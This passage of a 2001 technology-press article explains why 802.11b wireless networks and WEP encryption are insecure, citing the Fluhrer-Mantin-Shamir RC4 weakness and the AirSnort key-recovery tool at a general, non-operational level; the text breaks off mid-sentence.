Home: www.packetnexus.com
http://www.extremetech.com/print_article/0,3428,a%253D13880,00.asp Exploiting and Protecting 802.11b Wireless Networks September 4, 2001 By: Craig Ellison How many network administrators do you think would allow a complete stranger to walk into their wiring closet and plug in their notebook to their company's network? Not too many, I suspect. But that's what's happening to companies coast-to-coast. Well, not exactly. Strangers aren't plugging into networks, but they are attaching to networks using 802.11b wireless network cards, and that's essentially the same thing. This year we've seen explosive growth in the deployment of 802.11b networks. With the huge volume of cards being offered by close to 100 vendors, prices have plummeted to sub-$100 for notebook cards, and as low as $150 for access points. Physical deployment is extremely simple, for corporations and home users alike--in fact, probably too simple. All you have to do to install an access point out is take it out of the box, plug it into the wired Ethernet segment and turn it on. And for corporations, that's the real problem. They plug in an access point in their network, and many times, it's behind their firewall. WECA's Double-Edged Sword Much of the growth in 802.11b networks could probably be accredited to WECA--the Wireless Ethernet Compatibility Alliance. WECA has developed an interoperability standard, named WI-FI (wireless fidelity), and vendors' products that bear the WI-FI logo must pass a suite of basic interoperability tests. WECA's goal was interoperability and ease of use, not security. When people plug in a WI-FI certified access point, it should work with any other WI-FI certified NIC. From a manufacturer's standpoint, that makes a lot of sense. Manufacturers really want a good "out of box" experience for their customers, as it cuts down on product returns. In fact, according to an industry source, even as easy as it is to install, about 25% of the networking gear purchased for home use is returned because of the perceived installation complexity. WEP is Wide Open The 802.11b standard includes a provision for encryption called WEP (Wired Equivalent Privacy). Depending on the manufacturer and the model of the NIC card and access point, there are two levels of WEP commonly available - one based on a 40-bit encryption key and 24-bit Initialization Vector (also called 64-bit encryption and generally considered insecure) and a 104-bit key plus the 24-bit IV (so called 128 bit encryption.) There has been a lot of "buzz" in the computer and technology press over the last several weeks about the basic insecurity of WEP. Recently, Scott Fluhrer, Istak Mantin and Adi Shamir published a paper titled "Weakness in the Key Scheduling Algorithm of RC4". This paper outlined a method for pulling up the master WEP key that would allow a hacker to pose as a legitimate user of the network. Two weeks ago, a program named AirSnort appeared on the Internet. AirSnort, a program that runs on a Linux system with a 2.4 kernel and Prism-based NICS, takes advantage of the exploit outlined in the Fluherer, Istak, Shamir paper, and can discover a WEP key after passively monitoring a wireless network. According to the site (http://airsnort.sourceforge.net), AirSnort can determine the WEP key in seconds after "listening" to